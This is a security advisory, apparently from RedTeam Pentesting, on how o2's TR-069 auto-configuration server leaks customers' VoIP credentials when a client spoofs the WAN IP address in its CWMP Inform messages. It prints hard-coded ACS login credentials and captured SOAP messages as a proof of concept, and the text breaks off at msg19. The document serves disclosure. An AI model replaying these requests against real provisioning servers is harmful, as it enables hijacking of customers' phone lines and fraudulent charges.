o2 DSL Auto Configuration Server Credential Disclosure

2016-01-08T00:00:00
ID PACKETSTORM:135187
Type packetstorm
Reporter redteam-pentesting.de
Modified 2016-01-08T00:00:00

Description

                                        
                                            `Advisory: o2/Telefonica Germany: ACS Discloses VoIP/SIP Credentials  
  
The o2 Auto Configuration Server (ACS) discloses VoIP/SIP credentials of  
arbitrary customers when receiving manipulated CWMP packets. These  
credentials can then be used by an attacker to register any VoIP number  
of the victim. This enables the attacker to place and receive calls on  
behalf of the attacked user.  
  
  
Details  
=======  
  
Product: o2 DSL Auto Configuration Server  
Vulnerability Type: Information Disclosure  
Security Risk: high  
Vendor URL: https://o2online.de/  
Vendor Status: fixed  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-005  
Advisory Status: published  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
TR-069 (Technical Report 069) is a Broadband Forum technical  
specification entitled "CPE WAN Management Protocol" (CWMP). It defines  
an application layer protocol for remote management of end-user devices.  
  
(from Wikipedia)  
  
A more technical introduction to TR-069 can be found in a deck of slides  
which the Interoperability Laboratory at the University of New Hampshire  
has published on that topic [0].  
  
  
More Details  
============  
  
The German Internet Service Provider o2 uses the TR-069 protocol for the  
provisioning of Customer Premises Equipment (CPE). Among other settings,  
VoIP/SIP credentials are transferred and VoIP telephony is set up.  
  
In our setup, an AVM FRITZ!Box 7490 was monitored during the initial  
autoconfiguration process. During that process, several CWMP messages  
are exchanged. These CWMP messages are transferred via HTTPS as SOAP  
requests and replies. The HTTPS connection is always established by the  
CPE which connects to the Auto Configuration Server (ACS). According to  
the CWMP, the CPE may do so on the occasion of several events,  
including, but not limited to:  
  
* BOOTSTRAP - first contact between CPE and ACS  
* BOOT - when CPE has rebooted  
* PERIODIC - after a period of time, defined by the ACS  
* CONNECTION REQUEST - ACS signals a connection request to the CPE via a  
second HTTP channel  
  
The "CONNECTION REQUEST" is the only event that can be triggered by the  
ACS. To do so, the ACS establishes an unencrypted HTTP connection to the  
CPE and authenticates via HTTP basic access authentication with a  
"ConnectionRequestUsername" and a "ConnectionRequestPassword". No  
further data is exchanged on that channel. Once the CPE has verified the  
credentials, it then initiates the real CWMP conversation by sending a  
CWMP-Inform message to the pre-defined ACS. The connection initiated by  
the CPE is TLS-secured and the CPE provides a username  
(ManagementServer.Username) and a password (ManagementServer.Password)  
to authenticate itself towards the ACS.  
  
A typical CWMP conversation (including the "CONNECTION REQUEST" event)  
is depicted below:  
  
  
.----------------Connection Request---------------. ]  
| | ]  
v | ]  
----------. .-------- ]---> HTTP  
|Port| | | ]  
|8089| | | ]  
`----' | | ACS ]  
| | |  
| | |----. ]  
`----> | ---Inform------------------------> | | ]  
| <---InformResponse---------------- | | ]  
| | | ]  
| ---[empty]-----------------------> | | ]  
| <---SetParameterValues------------ | | ]  
| | | ]  
| ---SetParameterValuesResponse----> |Port| ]---> CWMP  
| <---SetParameterValues------------ | 443| ] (HTTPS)  
| | | ]  
CPE | [...] | | ]  
| | | ]  
| ---SetParameterValuesResponse----> | | ]  
| <---[empty]----------------------- | | ]  
| | | ]  
  
During our research, it was observed that the ACS URL as well as  
credentials for the initial connection to the ACS are hard-coded. On a  
stock AVM FRITZ!Box, running the firmware version 6.20, these can be  
found in the file ./providers/otwored/tr069.cfg which is part of the  
archive /etc/default.Fritz_Box_HW185/avm/providers-049.tar. For  
o2/Telefonica these credentials are:  
  
tr069cfg {  
enabled = yes;  
igd {  
DeviceInfo {  
ProvisioningCode = "";  
}  
managementserver {  
url = "https://acs.o2online.de/nbbs/tr69";  
username = "00040E-000000000000";  
password = "o2acs";  
URLAlreadyContacted = no;  
PeriodicInformEnable = yes;  
PeriodicInformInterval = 3600;  
}  
}  
FirmwareDownload {  
enabled = yes;  
enabled_converted = yes;  
}  
ACS_SSL {  
verify_server = yes;  
trusted_ca_file = "/etc/default/avm/root_ca.pem";  
}  
Download_SSL {  
verify_server = yes;  
trusted_ca_file = "/etc/default/avm/root_ca.pem";  
}  
}  
  
To ease the interaction with the ACS, a minimal TR-069 client was  
implemented. With this rogue client it was possible to simulate the  
behaviour of an AVM FRITZ!Box 7490 during the initial autoconfiguration  
process. Thus, in the following description, the word "CPE" may be  
replaced equally with "rogue client".  
  
After the CPE connects to the ACS (see [msg00] in section Proof of  
Concept), it gets configured to accept new credentials for incoming  
connection requests:  
  
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername  
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword  
(see [msg03])  
  
The CPE is now capable of receiving connection requests from the ACS.  
After several seconds, the ACS initiates a connection request and the  
CPE starts a CWMP conversation (see [msg06]). During that conversation,  
the ACS (ACS A) provides a new ACS URL (ACS B) together with a new set  
of login credentials for ACS B:  
  
* InternetGatewayDevice.ManagementServer.URL  
* InternetGatewayDevice.ManagementServer.Username  
* InternetGatewayDevice.ManagementServer.Password  
* InternetGatewayDevice.ManagementServer.ConnectionRequestUsername  
* InternetGatewayDevice.ManagementServer.ConnectionRequestPassword  
(see [msg09])  
  
Finally, the CPE is rebooted. From that point in time, all CWMP  
conversation is directed to ACS B. On the occasion of the "BOOT" event,  
the CPE connects to ACS B (see [msg12]) and receives the following  
settings:  
  
* InternetGatewayDevice.ManagementServer.PeriodicInformEnable  
* InternetGatewayDevice.ManagementServer.PeriodicInformInterval  
* InternetGatewayDevice.ManagementServer.PeriodicInformTime  
(see [msg15])  
  
After several seconds, again, the CPE receives a connection request. It  
connects to ACS B again (see [msg18]) and receives the VoIP credentials  
for all telephone numbers, that are assigned to the customer:  
  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.DirectoryNumber  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.AuthUserName  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.AuthPassword  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.RegistrarServer  
* InternetGatewayDevice.Services.VoiceService.1.  
VoiceProfile.1.Line.1.SIP.OutboundProxy  
(see [msg23])  
  
The first digits of the AuthPassword are taken from the phone number.  
  
In summary, the CPE has received VoIP credentials while it only supplied  
hard-coded login credentials for ACS A. As a result, the ACS must have  
identified the CPE by the WAN IP address. It was further determined that  
the ACS relies on the WAN/IPv4 address, which is specified as the  
parameter  
  
* InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
  
in the CWMP-Inform messages (see [msg00,06,12,18]).  
  
These CWMP-Inform messages can be manipulated by an attacker and  
therefore may contain arbitrary WAN IP addresses. If an attacker sends  
such spoofed CWMP-Inform messages during the whole two-step  
auto-provisioning process, the ACS returns VoIP credentials which are  
assigned to the IP address specified by the attacker.  
  
Additionally, any VoIP number issued by o2 may be registered from any o2  
DSL account. Even if the number is already registered by the legit  
customer's CPE, an attacker may register the number a second time.  
Incoming calls will be directed to both clients and may be answered by  
either of them. Furthermore, it allows an attacker to place and receive  
phone calls on behalf of any other customer. In consequence, the victim  
will be charged with any costs resulting from the abuse.  
  
  
Proof of Concept  
================  
  
As a proof of concept, the CWMP conversation that was captured during  
the autoprovisioning of an AVM FRITZ!Box 7490 (Firmware 6.20) is given  
below. Each message is the body of an HTTPS POST request (to the ACS) or  
an HTTPS POST reply (from the ACS). Some messages have been wrapped to  
obtain better readability.  
  
Communication with ACS A:  
  
------------------------------------------------------------------------  
[msg00] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">100</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[2]">  
<EventStruct>  
<EventCode>1 BOOT</EventCode>  
<CommandKey/>  
</EventStruct>  
<EventStruct>  
<EventCode>0 BOOTSTRAP</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:32+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg01] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">100</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg02] CPE -> ACS A:  
---------------------  
  
[empty]  
  
[msg03] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[4]">  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.PeriodicInformEnable  
</Name>  
<Value xsi:type="xsd:boolean">1</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestUsername  
</Name>  
<Value xsi:type="xsd:string">0896D776FAA2</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestPassword</Name>  
<Value xsi:type="xsd:string">  
57d29f69eca7b5ca484e4644bf9720  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
PeriodicInformInterval  
</Name>  
<Value xsi:type="xsd:unsignedInt">200</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>null</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg04] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg05] CPE <- ACS A:  
---------------------  
  
[empty]  
  
[msg06] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">null0</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[1]">  
<EventStruct>  
<EventCode>6 CONNECTION REQUEST</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:34+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string">null</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg07] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">null0</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg08] CPE -> ACS A:  
---------------------  
  
[empty]  
  
[msg09] CPE <- ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[5]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.ManagementServer.URL</Name>  
<Value xsi:type="xsd:string">  
https://hdm.o2online.de:443/cwmpWeb/CPEMgt  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.ManagementServer.Username</Name>  
<Value xsi:type="xsd:string">0896D776FAA2</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.ManagementServer.Password</Name>  
<Value xsi:type="xsd:string">1410193655111a</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestUsername  
</Name>  
<Value xsi:type="xsd:string">0896D776FAA2</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
ConnectionRequestPassword  
</Name>  
<Value xsi:type="xsd:string">1410193655111a</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315846</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
[msg10] CPE -> ACS A:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg11] CPE <- ACS A:  
---------------------  
  
initializeSession:null  
  
------------------------------------------------------------------------  
  
Communication with ACS B:  
  
------------------------------------------------------------------------  
[msg12] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158460</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[2]">  
<EventStruct>  
<EventCode>1 BOOT</EventCode>  
<CommandKey/>  
</EventStruct>  
<EventStruct>  
<EventCode>0 BOOTSTRAP</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:35+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string">39315846</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg13] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158460</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:InformResponse>  
<MaxEnvelopes>1</MaxEnvelopes>  
</cwmp:InformResponse>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
[msg14] CPE -> ACS B:  
---------------------  
  
[empty]  
  
[msg15] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soapenv:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0"  
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<soapenv:Header>  
<cwmp:ID soapenv:mustUnderstand="1">393158490</cwmp:ID>  
</soapenv:Header>  
<soapenv:Body>  
<cwmp:SetParameterValues>  
<ParameterList soap:arrayType="cwmp:ParameterValueStruct[3]">  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.PeriodicInformEnable  
</Name>  
<Value xsi:type="xsd:boolean">1</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.  
PeriodicInformInterval  
</Name>  
<Value xsi:type="xsd:unsignedInt">38888</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.PeriodicInformTime  
</Name>  
<Value xsi:type="xsd:dateTime">  
2014-09-08T10:49:21+1:00  
</Value>  
</ParameterValueStruct>  
</ParameterList>  
<ParameterKey>39315849</ParameterKey>  
</cwmp:SetParameterValues>  
</soapenv:Body>  
</soapenv:Envelope>  
  
  
[msg16] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:SetParameterValuesResponse>  
<Status>0</Status>  
</cwmp:SetParameterValuesResponse>  
</soap:Body>  
</soap:Envelope>  
  
[msg17] CPE <- ACS B:  
---------------------  
  
[empty]  
  
[msg18] CPE -> ACS B:  
---------------------  
  
<?xml version="1.0"?>  
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"  
xmlns:soap-enc="http://schemas.xmlsoap.org/soap/encoding/"  
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"  
xmlns:xsd="http://www.w3.org/2001/XMLSchema"  
xmlns:cwmp="urn:dslforum-org:cwmp-1-0">  
<soap:Header>  
<cwmp:ID soap:mustUnderstand="1">393158490</cwmp:ID>  
</soap:Header>  
<soap:Body>  
<cwmp:Inform>  
<DeviceId>  
<Manufacturer>AVM</Manufacturer>  
<OUI>00040E</OUI>  
<ProductClass>FRITZ!Box</ProductClass>  
<SerialNumber>0896D776FAA2</SerialNumber>  
</DeviceId>  
<Event soap-enc:arrayType="cwmp:EventStruct[1]">  
<EventStruct>  
<EventCode>6 CONNECTION REQUEST</EventCode>  
<CommandKey/>  
</EventStruct>  
</Event>  
<MaxEnvelopes>1</MaxEnvelopes>  
<CurrentTime>2014-09-08T18:27:36+02:00</CurrentTime>  
<RetryCount>0</RetryCount>  
<ParameterList soap-enc:arrayType="cwmp:ParameterValueStruct[8]">  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceSummary</Name>  
<Value xsi:type="xsd:string">  
InternetGatewayDevice:1.4[](Baseline:2, EthernetLAN:1,  
ADSLWAN:1,ADSL2WAN:1, Time:2, IPPing:1, WiFiLAN:2,  
DeviceAssociation:1), VoiceService:1.0[2](SIPEndpoint:1,  
Endpoint:1, TAEndpoint:1), StorageService:1.0[1](Baseline:1,  
FTPServer:1, NetServer:1, HTTPServer:1, UserAccess:1,  
VolumeConfig:1)  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.HardwareVersion</Name>  
<Value xsi:type="xsd:string">FRITZ!Box 7490</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SoftwareVersion</Name>  
<Value xsi:type="xsd:string">113.06.20</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.SpecVersion</Name>  
<Value xsi:type="xsd:string">1.0</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>InternetGatewayDevice.DeviceInfo.ProvisioningCode</Name>  
<Value xsi:type="xsd:string"/>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ParameterKey  
</Name>  
<Value xsi:type="xsd:string">39315849</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.ManagementServer.ConnectionRequestURL  
</Name>  
<Value xsi:type="xsd:string">  
http://78.48.x.x:8089/869f7018  
</Value>  
</ParameterValueStruct>  
<ParameterValueStruct>  
<Name>  
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.  
WANIPConnection.1.ExternalIPAddress  
</Name>  
<Value xsi:type="xsd:string">78.48.x.x</Value>  
</ParameterValueStruct>  
</ParameterList>  
</cwmp:Inform>  
</soap:Body>  
</soap:Envelope>  
  
[msg19] CPE <- ACS B:  
---------------------  
  
<?xml version="1.0"?>  
